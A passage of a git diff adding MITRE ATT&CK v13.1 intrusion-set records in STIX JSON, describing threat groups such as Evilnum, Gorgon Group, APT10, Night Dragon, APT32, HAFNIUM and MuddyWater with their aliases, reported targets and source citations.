"Symantec Dragonfly 2.0 October 2017", + "description": "Symantec. (2017, October 7). Dragonfly: Western energy sector targeted by sophisticated attack group. Retrieved April 19, 2022.", + "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks" + }, + { + "source_name": "UK GOV FSB Factsheet April 2022", + "description": "UK Gov. (2022, April 5). Russia's FSB malign activity: factsheet. 
Retrieved April 5, 2022.", + "url": "https://www.gov.uk/government/publications/russias-fsb-malign-cyber-activity-factsheet/russias-fsb-malign-activity-factsheet" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--1f0f9a14-11aa-49aa-9174-bcd0eaa979de.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--1f0f9a14-11aa-49aa-9174-bcd0eaa979de.json new file mode 100644 index 0000000000000000000000000000000000000000..e1d13b83450446ded797ec6fdb4f36a192fab70e --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--1f0f9a14-11aa-49aa-9174-bcd0eaa979de.json 
@@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--be53da41-2b59-4572-9a21-0caa24ad2f1c", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "Evilnum" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--1f0f9a14-11aa-49aa-9174-bcd0eaa979de", + "type": "intrusion-set", + "created": "2021-01-22T16:46:17.790Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "G0120", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0120" + }, + { + "source_name": "Evilnum", + "description": "(Citation: ESET EvilNum July 2020)" + }, + { + "source_name": "ESET EvilNum July 2020", + "url": "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/", + "description": "Porolli, M. (2020, July 9). More evil: A deep look at Evilnum and its toolset. Retrieved January 22, 2021." + } + ], + "modified": "2021-04-27T19:55:58.323Z", + "name": "Evilnum", + "description": "[Evilnum](https://attack.mitre.org/groups/G0120) is a financially motivated threat group that has been active since at least 2018.(Citation: ESET EvilNum July 2020)", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--1f21da59-6a13-455b-afd0-d58d0a5a7d27.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--1f21da59-6a13-455b-afd0-d58d0a5a7d27.json new file mode 100644 index 0000000000000000000000000000000000000000..15dda0a2f7531b488a2c3b6c8044e3e0a4012de9 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--1f21da59-6a13-455b-afd0-d58d0a5a7d27.json 
@@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--d6cf9de2-b669-4fc9-883f-cc0d1399dfb9", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "Gorgon Group" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--1f21da59-6a13-455b-afd0-d58d0a5a7d27", + "type": "intrusion-set", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0078", + "external_id": "G0078" + }, + { + "source_name": "Gorgon Group", + "description": "(Citation: Unit 42 Gorgon Group Aug 2018)" + }, + { + "source_name": "Unit 42 Gorgon Group Aug 2018", + "description": "Falcone, R., et al. (2018, August 02). The Gorgon Group: Slithering Between Nation State and Cybercrime. Retrieved August 7, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/" + } + ], + "modified": "2021-10-12T21:57:25.847Z", + "name": "Gorgon Group", + "description": "[Gorgon Group](https://attack.mitre.org/groups/G0078) is a threat group consisting of members who are suspected to be Pakistan-based or have other connections to Pakistan. The group has performed a mix of criminal and targeted attacks, including campaigns against government organizations in the United Kingdom, Spain, Russia, and the United States. (Citation: Unit 42 Gorgon Group Aug 2018)", + "x_mitre_version": "1.5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--222fbd21-fc4f-4b7e-9f85-0e6e3a76c33f.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--222fbd21-fc4f-4b7e-9f85-0e6e3a76c33f.json new file mode 100644 index 0000000000000000000000000000000000000000..8dba459087fc2fb3b7ae87141cad2b8ff7cc00a0 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--222fbd21-fc4f-4b7e-9f85-0e6e3a76c33f.json 
@@ -0,0 +1,130 @@ +{ + "type": "bundle", + "id": "bundle--602c8a34-63b8-41c2-ad3e-be26b5dd1917", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-23T15:06:31.019Z", + "name": "menuPass", + "description": "[menuPass](https://attack.mitre.org/groups/G0045) is a threat group that has been active since at least 2006. Individual members of [menuPass](https://attack.mitre.org/groups/G0045) are known to have acted in association with the Chinese Ministry of State Security's (MSS) Tianjin State Security Bureau and worked for the Huaying Haitai Science and Technology Development Company.(Citation: DOJ APT10 Dec 2018)(Citation: District Court of NY APT10 Indictment December 2018)\n\n[menuPass](https://attack.mitre.org/groups/G0045) has targeted healthcare, defense, aerospace, finance, maritime, biotechnology, energy, and government sectors globally, with an emphasis on Japanese organizations. In 2016 and 2017, the group is known to have targeted managed IT service providers (MSPs), manufacturing and mining companies, and a university.(Citation: Palo Alto menuPass Feb 2017)(Citation: Crowdstrike CrowdCast Oct 2013)(Citation: FireEye Poison Ivy)(Citation: PWC Cloud Hopper April 2017)(Citation: FireEye APT10 April 2017)(Citation: DOJ APT10 Dec 2018)(Citation: District Court of NY APT10 Indictment December 2018)", + "aliases": [ + "menuPass", + "Cicada", + "POTASSIUM", + "Stone Panda", + "APT10", + "Red Apollo", + "CVNX", + "HOGFISH" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "2.1", + "x_mitre_contributors": [ + "Edward Millington", + "Michael Cox" + ], + "type": "intrusion-set", + "id": "intrusion-set--222fbd21-fc4f-4b7e-9f85-0e6e3a76c33f", + "created": "2017-05-31T21:32:09.054Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0045", + "external_id": "G0045" + }, + { + "source_name": "HOGFISH", + 
"description": "(Citation: Accenture Hogfish April 2018)" + }, + { + "source_name": "POTASSIUM", + "description": "(Citation: DOJ APT10 Dec 2018)(Citation: District Court of NY APT10 Indictment December 2018)" + }, + { + "source_name": "Stone Panda", + "description": "(Citation: Palo Alto menuPass Feb 2017)(Citation: Accenture Hogfish April 2018)(Citation: DOJ APT10 Dec 2018)(Citation: District Court of NY APT10 Indictment December 2018)(Citation: Symantec Cicada November 2020)" + }, + { + "source_name": "APT10", + "description": "(Citation: Palo Alto menuPass Feb 2017)(Citation: Accenture Hogfish April 2018)(Citation: FireEye APT10 Sept 2018)(Citation: DOJ APT10 Dec 2018)(Citation: Symantec Cicada November 2020)" + }, + { + "source_name": "menuPass", + "description": "(Citation: Palo Alto menuPass Feb 2017)(Citation: DOJ APT10 Dec 2018)(Citation: District Court of NY APT10 Indictment December 2018)" + }, + { + "source_name": "Red Apollo", + "description": "(Citation: PWC Cloud Hopper April 2017)(Citation: DOJ APT10 Dec 2018)(Citation: District Court of NY APT10 Indictment December 2018)" + }, + { + "source_name": "CVNX", + "description": "(Citation: PWC Cloud Hopper April 2017)(Citation: DOJ APT10 Dec 2018)(Citation: District Court of NY APT10 Indictment December 2018)" + }, + { + "source_name": "Cicada", + "description": "(Citation: Symantec Cicada November 2020)" + }, + { + "source_name": "Accenture Hogfish April 2018", + "description": "Accenture Security. (2018, April 23). Hogfish Redleaves Campaign. Retrieved July 2, 2018.", + "url": "http://web.archive.org/web/20220810112638/https:/www.accenture.com/t20180423T055005Z_w_/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf" + }, + { + "source_name": "Crowdstrike CrowdCast Oct 2013", + "description": "Crowdstrike. (2013, October 16). CrowdCasts Monthly: You Have an Adversary Problem. 
Retrieved March 1, 2017.", + "url": "https://www.slideshare.net/CrowdStrike/crowd-casts-monthly-you-have-an-adversary-problem" + }, + { + "source_name": "FireEye APT10 April 2017", + "description": "FireEye iSIGHT Intelligence. (2017, April 6). APT10 (MenuPass Group): New Tools, Global Campaign Latest Manifestation of Longstanding Threat. Retrieved June 29, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html" + }, + { + "source_name": "FireEye Poison Ivy", + "description": "FireEye. (2014). POISON IVY: Assessing Damage and Extracting Intelligence. Retrieved November 12, 2014.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-poison-ivy.pdf" + }, + { + "source_name": "FireEye APT10 Sept 2018", + "description": "Matsuda, A., Muhammad I. (2018, September 13). APT10 Targeting Japanese Corporations Using Updated TTPs. Retrieved September 17, 2018.", + "url": "https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html" + }, + { + "source_name": "Palo Alto menuPass Feb 2017", + "description": "Miller-Osborn, J. and Grunzweig, J.. (2017, February 16). menuPass Returns with New Malware and New Attacks Against Japanese Academics and Organizations. Retrieved March 1, 2017.", + "url": "http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/" + }, + { + "source_name": "PWC Cloud Hopper April 2017", + "description": "PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved April 5, 2017.", + "url": "https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf" + }, + { + "source_name": "Symantec Cicada November 2020", + "description": "Symantec. (2020, November 17). Japan-Linked Organizations Targeted in Long-Running and Sophisticated Attack Campaign. 
Retrieved December 17, 2020.", + "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-japan-espionage" + }, + { + "source_name": "DOJ APT10 Dec 2018", + "description": "United States District Court Southern District of New York (USDC SDNY) . (2018, December 17). United States of America v. Zhu Hua and Zhang Shilong. Retrieved April 17, 2019.", + "url": "https://www.justice.gov/opa/pr/two-chinese-hackers-associated-ministry-state-security-charged-global-computer-intrusion" + }, + { + "source_name": "District Court of NY APT10 Indictment December 2018", + "description": "US District Court Southern District of New York. (2018, December 17). United States v. Zhu Hua Indictment. Retrieved December 17, 2020.", + "url": "https://www.justice.gov/opa/page/file/1122671/download" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--23b6a0f5-fa95-46f9-a6f3-4549c5e45ec8.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--23b6a0f5-fa95-46f9-a6f3-4549c5e45ec8.json new file mode 100644 index 0000000000000000000000000000000000000000..4f9947d9f87ebacb06567c9b6146ceac0836921b --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--23b6a0f5-fa95-46f9-a6f3-4549c5e45ec8.json 
@@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--ebcd5955-d35a-4012-99a3-56ced6a25a6f", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-09-22T20:54:08.611Z", + "name": "Night Dragon", + "description": "[Night Dragon](https://attack.mitre.org/groups/G0014) is a campaign name for activity involving a threat group that has conducted activity originating primarily in China. (Citation: McAfee Night Dragon)", + "aliases": [ + "Night Dragon" + ], + "x_mitre_deprecated": true, + "x_mitre_version": "1.4", + "type": "intrusion-set", + "id": "intrusion-set--23b6a0f5-fa95-46f9-a6f3-4549c5e45ec8", + "created": "2017-05-31T21:31:51.643Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0014", + "external_id": "G0014" + }, + { + "source_name": "Night Dragon", + "description": "(Citation: McAfee Night Dragon)" + }, + { + "source_name": "McAfee Night Dragon", + "description": "McAfee\u00ae Foundstone\u00ae Professional Services and McAfee Labs\u2122. (2011, February 10). Global Energy Cyberattacks: \u201cNight Dragon\u201d. Retrieved February 19, 2018.", + "url": "https://scadahacker.com/library/Documents/Cyber_Events/McAfee%20-%20Night%20Dragon%20-%20Global%20Energy%20Cyberattacks.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--247cb30b-955f-42eb-97a5-a89fef69341e.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--247cb30b-955f-42eb-97a5-a89fef69341e.json new file mode 100644 index 0000000000000000000000000000000000000000..5c79dd2d48946e8a82f5a9dd48b78099cbe3a442 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--247cb30b-955f-42eb-97a5-a89fef69341e.json 
@@ -0,0 +1,89 @@ +{ + "type": "bundle", + "id": "bundle--dbcf65ee-77ea-44e8-a5ca-c4d64385d9c0", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-21T21:04:18.158Z", + "name": "APT32", + "description": "[APT32](https://attack.mitre.org/groups/G0050) is a suspected Vietnam-based threat group that has been active since at least 2014. The group has targeted multiple private sector industries as well as foreign governments, dissidents, and journalists with a strong focus on Southeast Asian countries like Vietnam, the Philippines, Laos, and Cambodia. They have extensively used strategic web compromises to compromise victims.(Citation: FireEye APT32 May 2017)(Citation: Volexity OceanLotus Nov 2017)(Citation: ESET OceanLotus)", + "aliases": [ + "APT32", + "SeaLotus", + "OceanLotus", + "APT-C-00" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "2.6", + "x_mitre_contributors": [ + "Romain Dumont, ESET" + ], + "type": "intrusion-set", + "id": "intrusion-set--247cb30b-955f-42eb-97a5-a89fef69341e", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0050", + "external_id": "G0050" + }, + { + "source_name": "SeaLotus", + "description": "(Citation: Cybereason Oceanlotus May 2017)" + }, + { + "source_name": "APT-C-00", + "description": "(Citation: ESET OceanLotus)(Citation: Cybereason Oceanlotus May 2017)(Citation: ESET OceanLotus Mar 2019)(Citation: Amnesty Intl. Ocean Lotus February 2021)" + }, + { + "source_name": "APT32", + "description": "(Citation: FireEye APT32 May 2017)(Citation: Volexity OceanLotus Nov 2017)(Citation: Cybereason Oceanlotus May 2017)(Citation: ESET OceanLotus Mar 2019)(Citation: Amnesty Intl. 
Ocean Lotus February 2021)" + }, + { + "source_name": "OceanLotus", + "description": "(Citation: FireEye APT32 May 2017)(Citation: Volexity OceanLotus Nov 2017)(Citation: Cybereason Oceanlotus May 2017)(Citation: ESET OceanLotus Mar 2019)(Citation: Amnesty Intl. Ocean Lotus February 2021)" + }, + { + "source_name": "Amnesty Intl. Ocean Lotus February 2021", + "description": "Amnesty International. (2021, February 24). Vietnamese activists targeted by notorious hacking group. Retrieved March 1, 2021.", + "url": "https://www.amnestyusa.org/wp-content/uploads/2021/02/Click-and-Bait_Vietnamese-Human-Rights-Defenders-Targeted-with-Spyware-Attacks.pdf" + }, + { + "source_name": "FireEye APT32 May 2017", + "description": "Carr, N.. (2017, May 14). Cyber Espionage is Alive and Well: APT32 and the Threat to Global Corporations. Retrieved June 18, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html" + }, + { + "source_name": "Cybereason Oceanlotus May 2017", + "description": "Dahan, A. (2017, May 24). OPERATION COBALT KITTY: A LARGE-SCALE APT IN ASIA CARRIED OUT BY THE OCEANLOTUS GROUP. Retrieved November 5, 2018.", + "url": "https://www.cybereason.com/blog/operation-cobalt-kitty-apt" + }, + { + "source_name": "ESET OceanLotus Mar 2019", + "description": "Dumont, R. (2019, March 20). Fake or Fake: Keeping up with OceanLotus decoys. Retrieved April 1, 2019.", + "url": "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/" + }, + { + "source_name": "ESET OceanLotus", + "description": "Folt\u00fdn, T. (2018, March 13). OceanLotus ships new backdoor using old tricks. Retrieved May 22, 2018.", + "url": "https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/" + }, + { + "source_name": "Volexity OceanLotus Nov 2017", + "description": "Lassalle, D., et al. (2017, November 6). 
OceanLotus Blossoms: Mass Digital Surveillance and Attacks Targeting ASEAN, Asian Nations, the Media, Human Rights Groups, and Civil Society. Retrieved November 6, 2017.", + "url": "https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--2688b13e-8e71-405a-9c40-0dee94bddf87.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--2688b13e-8e71-405a-9c40-0dee94bddf87.json new file mode 100644 index 0000000000000000000000000000000000000000..90a71e5f3119429d918f5a11682d6f92e37ee8b6 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--2688b13e-8e71-405a-9c40-0dee94bddf87.json 
@@ -0,0 +1,59 @@ +{ + "type": "bundle", + "id": "bundle--7bd7076d-08af-4507-98bd-de80bcace430", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-10T21:54:46.756Z", + "name": "HAFNIUM", + "description": "[HAFNIUM](https://attack.mitre.org/groups/G0125) is a likely state-sponsored cyber espionage group operating out of China that has been active since at least January 2021. [HAFNIUM](https://attack.mitre.org/groups/G0125) primarily targets entities in the US across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs.(Citation: Microsoft HAFNIUM March 2020)(Citation: Volexity Exchange Marauder March 2021)", + "aliases": [ + "HAFNIUM", + "Operation Exchange Marauder" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "1.3", + "x_mitre_contributors": [ + "Daniyal Naeem, BT Security", + "Matt Brenton, Zurich Insurance Group", + "Mayuresh Dani, Qualys", + "Harshal Tupsamudre, Qualys", + "Vinayak Wadhwa, SAFE Security" + ], + "type": "intrusion-set", + "id": "intrusion-set--2688b13e-8e71-405a-9c40-0dee94bddf87", + "created": "2021-03-03T19:40:47.280Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0125", + "external_id": "G0125" + }, + { + "source_name": "Operation Exchange Marauder", + "description": "(Citation: Volexity Exchange Marauder March 2021)" + }, + { + "source_name": "Volexity Exchange Marauder March 2021", + "description": "Gruzweig, J. et al. (2021, March 2). Operation Exchange Marauder: Active Exploitation of Multiple Zero-Day Microsoft Exchange Vulnerabilities. 
Retrieved March 3, 2021.", + "url": "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/" + }, + { + "source_name": "Microsoft HAFNIUM March 2020", + "description": "MSTIC. (2021, March 2). HAFNIUM targeting Exchange Servers with 0-day exploits. Retrieved March 3, 2021.", + "url": "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--269e8108-68c6-4f99-b911-14b2e765dec2.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--269e8108-68c6-4f99-b911-14b2e765dec2.json new file mode 100644 index 0000000000000000000000000000000000000000..b1deb727e0838e7bd872b98fa330a63806b13129 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--269e8108-68c6-4f99-b911-14b2e765dec2.json 
@@ -0,0 +1,125 @@ +{ + "type": "bundle", + "id": "bundle--744d8b7f-30a9-4ad9-a744-10689a9240dd", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-22T04:59:16.032Z", + "name": "MuddyWater", + "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) is a cyber espionage group assessed to be a subordinate element within Iran's Ministry of Intelligence and Security (MOIS).(Citation: CYBERCOM Iranian Intel Cyber January 2022) Since at least 2017, [MuddyWater](https://attack.mitre.org/groups/G0069) has targeted a range of government and private organizations across sectors, including telecommunications, local government, defense, and oil and natural gas organizations, in the Middle East, Asia, Africa, Europe, and North America.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: Symantec MuddyWater Dec 2018)(Citation: ClearSky MuddyWater Nov 2018)(Citation: ClearSky MuddyWater June 2019)(Citation: Reaqta MuddyWater November 2017)(Citation: DHS CISA AA22-055A MuddyWater February 2022)(Citation: Talos MuddyWater Jan 2022)", + "aliases": [ + "MuddyWater", + "Earth Vetala", + "MERCURY", + "Static Kitten", + "Seedworm", + "TEMP.Zagros" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "4.1", + "x_mitre_contributors": [ + "Ozer Sarilar, @ozersarilar, STM", + "Daniyal Naeem, BT Security" + ], + "type": "intrusion-set", + "id": "intrusion-set--269e8108-68c6-4f99-b911-14b2e765dec2", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0069", + "external_id": "G0069" + }, + { + "source_name": "MERCURY", + "description": "(Citation: Anomali Static Kitten February 2021)" + }, + { + "source_name": "Static Kitten", + "description": "(Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021)" + }, + { + "source_name": "TEMP.Zagros", + 
"description": "(Citation: FireEye MuddyWater Mar 2018)(Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021)" + }, + { + "source_name": "Seedworm", + "description": "(Citation: Symantec MuddyWater Dec 2018)(Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021)" + }, + { + "source_name": "Earth Vetala", + "description": "(Citation: Trend Micro Muddy Water March 2021)" + }, + { + "source_name": "MuddyWater", + "description": "(Citation: Unit 42 MuddyWater Nov 2017)(Citation: Symantec MuddyWater Dec 2018)" + }, + { + "source_name": "ClearSky MuddyWater Nov 2018", + "description": "ClearSky Cyber Security. (2018, November). MuddyWater Operations in Lebanon and Oman: Using an Israeli compromised domain for a two-stage campaign. Retrieved November 29, 2018.", + "url": "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf" + }, + { + "source_name": "ClearSky MuddyWater June 2019", + "description": "ClearSky. (2019, June). Iranian APT group \u2018MuddyWater\u2019 Adds Exploits to Their Arsenal. Retrieved May 14, 2020.", + "url": "https://www.clearskysec.com/wp-content/uploads/2019/06/Clearsky-Iranian-APT-group-%E2%80%98MuddyWater%E2%80%99-Adds-Exploits-to-Their-Arsenal.pdf" + }, + { + "source_name": "CYBERCOM Iranian Intel Cyber January 2022", + "description": "Cyber National Mission Force. (2022, January 12). Iranian intel cyber suite of malware uses open source tools. Retrieved September 30, 2022.", + "url": "https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/" + }, + { + "source_name": "DHS CISA AA22-055A MuddyWater February 2022", + "description": "FBI, CISA, CNMF, NCSC-UK. (2022, February 24). Iranian Government-Sponsored Actors Conduct Cyber Operations Against Global Government and Commercial Networks. 
Retrieved September 27, 2022.", + "url": "https://www.cisa.gov/uscert/ncas/alerts/aa22-055a" + }, + { + "source_name": "Unit 42 MuddyWater Nov 2017", + "description": "Lancaster, T.. (2017, November 14). Muddying the Water: Targeted Attacks in the Middle East. Retrieved March 15, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/" + }, + { + "source_name": "Talos MuddyWater Jan 2022", + "description": "Malhortra, A and Ventura, V. (2022, January 31). Iranian APT MuddyWater targets Turkish users via malicious PDFs, executables. Retrieved June 22, 2022.", + "url": "https://blog.talosintelligence.com/2022/01/iranian-apt-muddywater-targets-turkey.html" + }, + { + "source_name": "Anomali Static Kitten February 2021", + "description": "Mele, G. et al. (2021, February 10). Probable Iranian Cyber Actors, Static Kitten, Conducting Cyberespionage Campaign Targeting UAE and Kuwait Government Agencies. Retrieved March 17, 2021.", + "url": "https://www.anomali.com/blog/probable-iranian-cyber-actors-static-kitten-conducting-cyberespionage-campaign-targeting-uae-and-kuwait-government-agencies" + }, + { + "source_name": "Trend Micro Muddy Water March 2021", + "description": "Peretz, A. and Theck, E. (2021, March 5). Earth Vetala \u2013 MuddyWater Continues to Target Organizations in the Middle East. Retrieved March 18, 2021.", + "url": "https://www.trendmicro.com/en_us/research/21/c/earth-vetala---muddywater-continues-to-target-organizations-in-t.html" + }, + { + "source_name": "Reaqta MuddyWater November 2017", + "description": "Reaqta. (2017, November 22). A dive into MuddyWater APT targeting Middle-East. Retrieved May 18, 2020.", + "url": "https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/" + }, + { + "source_name": "FireEye MuddyWater Mar 2018", + "description": "Singh, S. et al.. (2018, March 13). 
Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign. Retrieved April 11, 2018.", + "url": "https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html" + }, + { + "source_name": "Symantec MuddyWater Dec 2018", + "description": "Symantec DeepSight Adversary Intelligence Team. (2018, December 10). Seedworm: Group Compromises Government Agencies, Oil & Gas, NGOs, Telecoms, and IT Firms. Retrieved December 14, 2018.", + "url": "https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--277d2f87-2ae5-4730-a3aa-50c1fdff9656.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--277d2f87-2ae5-4730-a3aa-50c1fdff9656.json new file mode 100644 index 0000000000000000000000000000000000000000..629fa3a49aa9ee379b97e2d952f087c0feeb82fa --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--277d2f87-2ae5-4730-a3aa-50c1fdff9656.json 
